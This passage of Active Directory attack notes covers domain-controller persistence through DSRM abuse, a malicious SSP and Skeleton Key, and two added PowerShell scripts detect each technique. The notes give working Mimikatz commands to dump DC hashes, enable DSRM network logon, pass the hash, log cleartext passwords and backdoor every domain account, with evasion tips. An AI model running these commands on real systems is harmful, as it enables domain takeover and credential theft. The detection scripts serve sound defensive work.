Run "PersistWMI"; it executes alongside another program, e.g. when the victim opens Chrome, our persistence calls back.
DSRM
Directory Services Restore Mode: the password of the DC's local Administrator account, set when the server is promoted to a DC and afterwards rarely used or changed. We either obtain its hash or reset it (ntdsutil's "set dsrm password", which logs event 4794 on the DC):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <dc>
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <dc>
# Compare the two Administrator hashes: lsadump::sam reads the DC's local SAM, so its Administrator entry is the DSRM account; lsadump::lsa /patch dumps the domain accounts
# We can pth into the DC with the DSRM NTLM hash, but by default the account only works in DSRM boot, so first change its logon behaviour (2 = always allow logon)
Enter-PSSession -ComputerName <dc>
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# Pth into it. The DSRM account is local to the DC, so /domain is the DC's hostname, not the domain name
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<dc-hostname> /user:Administrator /ntlm:<hash> /run:powershell.exe"'
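A check for the DSRM persistence above, added here as an example and not part of the original notes: it audits every DC for the logon-behaviour value, for the 4794 event that a DSRM password reset raises, and for network logons of the DC's own local Administrator, which is what a pass-the-hash with the DSRM hash looks like in the Security log. It assumes the ActiveDirectory module, WinRM and remote event-log access to the DCs; the 7-day window and the output format are arbitrary.

```powershell
# Added audit script (not from the original notes). Assumptions: run as a domain admin
# with the ActiveDirectory module, WinRM and remote event-log access to every DC.
param([int]$Days = 7)

# Pull one named field out of an event's EventData instead of relying on property indexes
function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Record, [string]$Name)
    (([xml]$Record.ToXml()).Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

$since = (Get-Date).AddDays(-$Days)
$sinceMs = [long]$Days * 86400000   # timediff() in event-log XPath works in milliseconds

foreach ($dc in (Get-ADDomainController -Filter *).HostName) {
    # 4624 records the DC's NetBIOS name in upper case as the account domain of a local logon
    $hostname = (($dc -split '\.')[0]).ToUpper()

    # 1. DsrmAdminLogonBehavior: missing/0 = DSRM admin only usable in DSRM boot, 1 = also
    #    while AD DS is stopped, 2 = always (what the persistence sets). Non-zero is a finding.
    $behavior = Invoke-Command -ComputerName $dc -ScriptBlock {
        (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    }
    if (-not $behavior) { $behavior = 0 }
    '{0}: DsrmAdminLogonBehavior={1} {2}' -f $dc, $behavior, $(if ($behavior -ne 0) { '<-- FINDING' } else { '' })

    # 2. 4794 = "An attempt was made to set the Directory Services Restore Mode administrator
    #    password" (ntdsutil 'set dsrm password'). Legitimate use is rare enough to review each one.
    Get-WinEvent -ComputerName $dc -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Security'; Id = 4794; StartTime = $since
    } | ForEach-Object {
        '{0}: 4794 DSRM password set at {1} by {2}\{3}' -f $dc, $_.TimeCreated,
            (Get-EventField $_ 'SubjectDomainName'), (Get-EventField $_ 'SubjectUserName')
    }

    # 3. The DSRM admin is a *local* account on the DC, so a PtH with its hash produces a
    #    4624 network logon (type 3) whose account domain is the DC's own hostname rather
    #    than the AD domain. Filter server-side with XPath so we do not pull every 4624.
    $xpath = "*[System[EventID=4624 and TimeCreated[timediff(@SystemTime) <= $sinceMs]] and " +
             "EventData[Data[@Name='LogonType']='3' and Data[@Name='TargetDomainName']='$hostname' " +
             "and Data[@Name='TargetUserName']='Administrator']]"
    Get-WinEvent -ComputerName $dc -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            '{0}: local Administrator network logon at {1} from {2}' -f $dc, $_.TimeCreated, (Get-EventField $_ 'IpAddress')
        }
}
```

Run it periodically from a management host; the third check is the one that catches the pth step itself, because the domain Administrator logging on to a DC normally shows the AD domain, never the DC's hostname, as the account domain.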
Custom SSP
Security Support Provider: mimikatz ships mimilib.dll, which once registered as an SSP on the DC logs every password that passes through LSASS in cleartext (to kiwissp.log in System32). Registering it via the Security Packages registry value only takes effect after a reboot of the DC; the alternative is injecting the package into the running LSASS.
Skeleton Key
# misc::skeleton patches LSASS on the DC so that every domain account additionally accepts the master password "mimikatz" (the real passwords keep working). Compile it yourself and change that password. The patch lives only in memory, so a DC reboot removes it, and you may need to strip LSA process protection (RunAsPPL) first.
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <dc>
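A check for the SSP and Skeleton Key persistence above, added here as an example and not part of the original notes. It runs on the DC (or inside Invoke-Command) and looks for an unexpected SSP in the registry, the on-disk artifacts of mimilib and memssp, the state of LSA protection, and, because Skeleton Key leaves nothing on disk, a behavioural test: an NTLM bind as a real account using the master password. The SSP allowlist, the canary account name `svc-canary` and the default master password are assumptions; baseline the allowlist against a clean DC of the same build, and expect one 4625 on a clean DC from the bind test.

```powershell
# Added check (not from the original notes). Run on the DC itself or wrap it in Invoke-Command.
# Assumptions: the SSP allowlist matches a clean DC of the same build, and -TestUser is a
# low-value domain account you own (the bind test causes one 4625 on a clean DC).
param(
    [string]$TestUser = 'svc-canary',        # assumed canary account name
    [string]$MasterPassword = 'mimikatz'     # mimikatz's default; change it if the build was customised
)

$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$findings = New-Object System.Collections.Generic.List[string]

# 1. Registered SSPs. A dropped mimilib.dll shows up as an extra name in 'Security Packages'
#    under Lsa and (2012+/Win8+) under Lsa\OSConfig. Allowlist of Microsoft's own packages:
$knownSsp = 'kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap'
foreach ($key in $lsa, "$lsa\OSConfig") {
    $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
    foreach ($p in @($pkgs)) {
        $name = "$p".Trim('"').ToLower()     # the value can hold a literal "" placeholder entry
        if ($name -and $knownSsp -notcontains $name) { $findings.Add("unknown SSP '$p' registered in $key") }
    }
}

# 2. On-disk artifacts of mimikatz's SSP code: the DLL itself, kiwissp.log (mimilib as a
#    registered SSP) and mimilsa.log (misc::memssp injected into LSASS).
foreach ($f in 'mimilib.dll', 'kiwissp.log', 'mimilsa.log') {
    $path = Join-Path $env:SystemRoot "System32\$f"
    if (Test-Path $path) { $findings.Add("artifact on disk: $path") }
}

# 3. LSA protection. Patching LSASS (skeleton, memssp) fails with RunAsPPL=1 unless the
#    attacker first loads mimikatz's driver to strip it, so a missing value is a gap and the
#    driver's service being present is a smoking gun.
$ppl = (Get-ItemProperty -Path $lsa -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
if ($ppl -ne 1) { $findings.Add('RunAsPPL is not enabled on this DC') }
if (Get-Service -Name mimidrv -ErrorAction SilentlyContinue) { $findings.Add('mimidrv service present') }

# 4. Skeleton Key leaves nothing on disk; the patch lives in LSASS memory until reboot.
#    Test behaviourally: an NTLM bind as a real account with the master password must fail.
#    (Skeleton Key hooks NTLM password validation in msv1_0, which an NTLM LDAP bind exercises.)
Add-Type -AssemblyName System.DirectoryServices.Protocols
$ldap = New-Object System.DirectoryServices.Protocols.LdapConnection($env:COMPUTERNAME)
$ldap.AuthType = [System.DirectoryServices.Protocols.AuthType]::Ntlm
$cred = New-Object System.Net.NetworkCredential($TestUser, $MasterPassword, $env:USERDOMAIN)
try {
    $ldap.Bind($cred)
    $findings.Add("SKELETON KEY: '$TestUser' authenticated with the master password")
} catch [System.DirectoryServices.Protocols.LdapException] {
    # expected on a clean DC: "The supplied credential is invalid."
} finally {
    $ldap.Dispose()
}

if ($findings.Count) { $findings | ForEach-Object { "FINDING: $_" } } else { 'no findings' }
```

The bind test is the only one of the four that detects a default Skeleton Key deployment, and it only does so until the DC reboots; if the operator changed the master password in their build, it finds nothing, which is exactly why the RunAsPPL and mimidrv checks are there as well.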